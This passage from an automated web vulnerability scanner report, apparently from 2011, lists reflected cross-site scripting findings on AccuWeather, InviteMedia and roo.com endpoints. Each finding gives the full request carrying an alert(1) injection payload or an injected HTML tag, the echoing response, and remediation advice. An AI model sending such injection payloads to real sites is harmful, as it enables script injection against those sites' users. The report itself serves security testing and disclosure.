Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng8f38a"%3balert(1)//3a4adeadc39&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:07:45 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n14), ms jfk-agg-n14 ( origin>CONN)
Cache-Control: max-age=2700
Expires: Tue, 08 Feb 2011 03:52:45 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
ype;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng8f38a";alert(1)//3a4adeadc39&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng8f38a";
...[SNIP]...

1.41. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4da3"%3balert(1)//bd3f4a4236f was submitted in the logo parameter. This input was echoed as a4da3";alert(1)//bd3f4a4236f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1a4da3"%3balert(1)//bd3f4a4236f&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:07:04 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n31), ms jfk-agg-n31 ( origin>CONN)
Cache-Control: max-age=2940
Expires: Tue, 08 Feb 2011 03:56:04 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
unNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1a4da3";alert(1)//bd3f4a4236f&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1a4da3";
...[SNIP]...

1.42. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f2f"%3balert(1)//943109294fb was submitted in the metric parameter. This input was echoed as c9f2f";alert(1)//943109294fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0c9f2f"%3balert(1)//943109294fb&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:08:53 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n11), ms jfk-agg-n11 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Tue, 08 Feb 2011 04:01:53 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
dAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0c9f2f";alert(1)//943109294fb&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0c9f2f";
...[SNIP]...

1.43. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 319eb"%3balert(1)//bda5567410d was submitted in the partner parameter. This input was echoed as 319eb";alert(1)//bda5567410d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather319eb"%3balert(1)//bda5567410d&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:06:31 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n23), ms jfk-agg-n23 ( origin>CONN)
Cache-Control: max-age=2760
Expires: Tue, 08 Feb 2011 03:52:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
rsion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather319eb";alert(1)//bda5567410d&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather319eb";
...[SNIP]...

1.44. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4225d"%3balert(1)//807d6220ec9 was submitted in the tStyle parameter. This input was echoed as 4225d";alert(1)//807d6220ec9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell4225d"%3balert(1)//807d6220ec9&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:06:49 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n60), ms jfk-agg-n60 ( origin>CONN)
Cache-Control: max-age=2940
Expires: Tue, 08 Feb 2011 03:55:49 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
d","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell4225d";alert(1)//807d6220ec9&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell4225d";
...[SNIP]...

1.45. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca01f"%3balert(1)//2b15cdde25d was submitted in the target parameter. This input was echoed as ca01f";alert(1)//2b15cdde25d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_selfca01f"%3balert(1)//2b15cdde25d HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:09:14 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n12), ms jfk-agg-n12 ( origin>CONN)
Cache-Control: max-age=3540
Expires: Tue, 08 Feb 2011 04:08:14 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_selfca01f";alert(1)//2b15cdde25d&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_selfca01f";
...[SNIP]...

1.46. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b0a"%3balert(1)//e6dc9c8a978 was submitted in the theme parameter. This input was echoed as c1b0a";alert(1)//e6dc9c8a978 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtbluec1b0a"%3balert(1)//e6dc9c8a978&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:08:28 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n33), ms jfk-agg-n33 ( origin>CONN)
Cache-Control: max-age=3480
Expires: Tue, 08 Feb 2011 04:06:28 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtbluec1b0a";alert(1)//e6dc9c8a978&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtbluec1b0a";
...[SNIP]...

1.47. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10425"%3balert(1)//7495d05b121 was submitted in the zipcode parameter. This input was echoed as 10425";alert(1)//7495d05b121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=1000110425"%3balert(1)//7495d05b121&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 03:07:25 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n34 ( jfk-agg-n33), ms jfk-agg-n33 ( origin>CONN)
Cache-Control: max-age=3360
Expires: Tue, 08 Feb 2011 04:03:26 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3919


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
uginsPage;
if (mimeType) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=1000110425";alert(1)//7495d05b121&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=1000110425";
...[SNIP]...

1.48. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98db7'%3balert(1)//268143c519 was submitted in the admeld_callback parameter. This input was echoed as 98db7';alert(1)//268143c519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match98db7'%3balert(1)//268143c519 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; segments="38142|28666|17440|16748|3779|10069|18237|16490|39544|27804|16709|21886|18134|38582,1298044270|40657|22647|24085|10102|24391|30353|11262|5371|11265|10629|7775|10660|17277|8|16034|40589|10816|13746|27875|28398|39650|27906|40046|20981|10641|39646|29998|39220|39004|24461|4465|38028|16713|29994|3391|3783|24171|3392|23864|3425|9800|37720|24810|38781|27273|2377|24469"; dp_rec="{\"1\": 1297089043+ \"3\": 1297036137+ \"2\": 1296508071+ \"4\": 1296660699}"; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"8991\": [0+ 0+ 1297089042+ 2+ 1297089042+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; subID="{}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 08 Feb 2011 02:08:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 08-Feb-2011 02:08:38 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 717

document.write('<img width="0" height="0" src="http://tag.admeld.com/match98db7';alert(1)//268143c519?admeld_adprovider_id=300&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1297562938&custom_user_segments=%2C38142%2C28666%2C17440%2C16748%2C3779%2C10069%2C18237%2C16490%2C39544%2C2780
...[SNIP]...

1.49. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82198<a>9dafe648ad3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&82198<a>9dafe648ad3=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:20 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790&82198<a>9dafe648ad3=1/AdServerService.asmx" />
...[SNIP]...

1.50. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 617ba<a>cdb0e19b088 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790617ba<a>cdb0e19b088 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:18 GMT
Content-Length: 1907
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790617ba<a>cdb0e19b088/AdServerService.asmx" />
...[SNIP]...

1.51. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233790/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
